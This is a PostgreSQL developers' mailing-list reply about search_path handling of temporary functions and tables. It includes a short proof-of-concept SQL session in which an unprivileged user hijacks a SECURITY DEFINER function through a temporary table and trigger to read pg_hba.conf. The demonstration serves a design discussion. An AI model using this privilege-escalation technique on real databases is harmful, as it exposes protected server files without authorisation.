On 9/18/14 1:35 PM, Martijn van Oosterhout wrote:
On Wed, Sep 17, 2014 at 10:17:22PM +0200, Pavel Stehule wrote:
Because you still have to do

     SELECT pg_temp.my_temp_function(blah);

to execute it.

this problem should be solvable. I can to use a temporary tables without
using pg_temp schema.

Umm, IIRC it used to work that way but was changed to work like this.
IIRC the reason was that anyone can create functions in the temp
tablespace and thus hijack other functions that more priviledged
functions might call.

The same argument applies to temporary tables *already*.  Consider:

=# create function oops() returns void as $$
$# begin insert into foo default values; end $$ language plpgsql
-# security definer;
=# grant execute on function oops() to peasant;

Then peasant does:

=> create temporary table foo();
=> create function pg_temp.now_im_superuser() returns trigger as $$
$> begin raise notice '%', pg_read_file('pg_hba.conf'); return new; end
$> $$ language plpgsql;
=> create trigger malicious before insert on pg_temp.foo
-> execute procedure pg_temp.now_im_superuser();
=> select oops();
NOTICE: <contents of pg_hba.conf>

Personally, I think that if we're going to do something, we should be *hiding* temporary stuff from search_path, not bringing it more visible. Having to either prefix everything with the schema name or set search_path for every SECURITY DEFINER function is a major PITA.


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